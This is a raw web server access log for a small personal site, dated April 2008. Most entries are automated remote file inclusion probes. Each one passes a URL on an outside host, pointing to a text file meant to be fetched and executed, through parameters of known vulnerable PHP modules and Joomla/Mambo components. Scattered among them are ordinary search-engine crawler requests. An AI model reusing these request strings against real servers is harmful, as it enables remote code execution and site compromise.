193.239.5.15 - - [17/Apr/2008:10:59:30 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.214.180 - - [17/Apr/2008:11:02:49 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:03:14 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:03:14 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:03:15 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.226.214.180 - - [17/Apr/2008:11:03:20 -0700] "GET /@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.214.180 - - [17/Apr/2008:11:03:25 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:03:38 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:04:05 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:04:05 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:04:06 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:06:37 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:06:38 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:06:38 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.247.251.105 - - [17/Apr/2008:11:06:48 -0700] "GET //includes/db_adodb.php?baseDir=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.71.102.187 - - [17/Apr/2008:11:07:01 -0700] "GET /logs/access_080312.log//claroline/tracking/userLog.php?rootSys=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Apr/2008:11:07:01 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.55 - - [17/Apr/2008:11:07:49 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?S=A HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:08:22 -0700] "GET /minamijewelry/source_images/batch1/K4.jpg HTTP/1.0" 200 57930 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.23.164 - - [17/Apr/2008:11:09:32 -0700] "GET /logs/access_071210.log HTTP/1.0" 200 177334 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
99.238.107.156 - - [17/Apr/2008:11:09:32 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:09:34 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:09:34 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:09:34 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:10:02 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:10:02 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:10:03 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:10:26 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:10:27 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:10:27 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.214.180 - - [17/Apr/2008:11:11:56 -0700] "GET /logs/access_080219.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:13:02 -0700] "GET /minamijewelry/source_images/batch1/K1.jpg HTTP/1.0" 200 62680 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:13:03 -0700] "GET /minamijewelry/source_images/batch1/B5.jpg HTTP/1.0" 200 59212 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:13:04 -0700] "GET /minamijewelry/source_images/batch1/F5.jpg HTTP/1.0" 200 48318 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:13:05 -0700] "GET /minamijewelry/source_images/batch1/M1.jpg HTTP/1.0" 200 55157 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:13:30 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:13:30 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:13:30 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:13:31 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:11:13:31 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:13:31 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.226.214.180 - - [17/Apr/2008:11:15:10 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.247.251.105 - - [17/Apr/2008:11:16:19 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [17/Apr/2008:11:16:20 -0700] "GET //includes/db_adodb.php?baseDir=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [17/Apr/2008:11:16:20 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:16:59 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:17:01 -0700] "GET //citywriter/head.php?path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:17:02 -0700] "GET /logs//citywriter/head.php?path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:17:47 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:17:48 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:11:17:48 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET ///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET ///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:19 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:11:18:24 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.47.247.136 - - [17/Apr/2008:11:18:33 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:57 -0700] "GET /logs/access_080218.log///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:11:18:57 -0700] "GET /logs/access_080218.log///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:19:32 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:19:36 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:19:37 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:21:02 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:21:02 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:21:23 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:21:24 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:21:25 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
207.58.179.218 - - [17/Apr/2008:11:22:50 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.179.218 - - [17/Apr/2008:11:22:50 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:22:52 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:22:55 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:22:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:22:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:22:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.71.102.187 - - [17/Apr/2008:11:23:42 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:23:46 -0700] "GET /logs/index.php?body=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:23:47 -0700] "GET /index.php?body=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.138.162.12 - - [17/Apr/2008:11:23:55 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.138.162.12 - - [17/Apr/2008:11:23:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.138.162.12 - - [17/Apr/2008:11:23:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.190.201 - - [17/Apr/2008:11:23:56 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.254.190.201 - - [17/Apr/2008:11:23:58 -0700] "GET /skin/zero_vote/login.php?dir=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:24:33 -0700] "GET /logs/access_080321.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:25:03 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:25:07 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:25:07 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:25:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:25:53 -0700] "GET /minamijewelry/source_images/batch1/B6.jpg HTTP/1.0" 200 52174 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [17/Apr/2008:11:25:57 -0700] "GET /minamijewelry/source_images/batch1/K2.jpg HTTP/1.0" 200 61261 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:26:03 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:26:03 -0700] "GET //components/minibb/index.php?absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.179.218 - - [17/Apr/2008:11:26:08 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "dmulk.com"
207.58.179.218 - - [17/Apr/2008:11:26:08 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "dmulk.com"
74.6.17.158 - - [17/Apr/2008:11:27:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.158 - - [17/Apr/2008:11:27:19 -0700] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.133.60.199 - - [17/Apr/2008:11:27:45 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zodila.ilive.ro/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.60.199 - - [17/Apr/2008:11:27:46 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://zodila.ilive.ro/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.60.199 - - [17/Apr/2008:11:27:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://zodila.ilive.ro/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.254.190.201 - - [17/Apr/2008:11:29:11 -0700] "GET /skin/zero_vote/login.php?dir=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "dmulk.com"
213.254.190.201 - - [17/Apr/2008:11:29:12 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "dmulk.com"
193.138.206.219 - - [17/Apr/2008:11:29:22 -0700] "GET /logs/access_080321.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.138.162.12 - - [17/Apr/2008:11:29:25 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:30:11 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:30:11 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
67.195.54.40 - - [17/Apr/2008:11:30:29 -0700] "GET /blane/?D=A HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:11:34:01 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:11:34:02 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
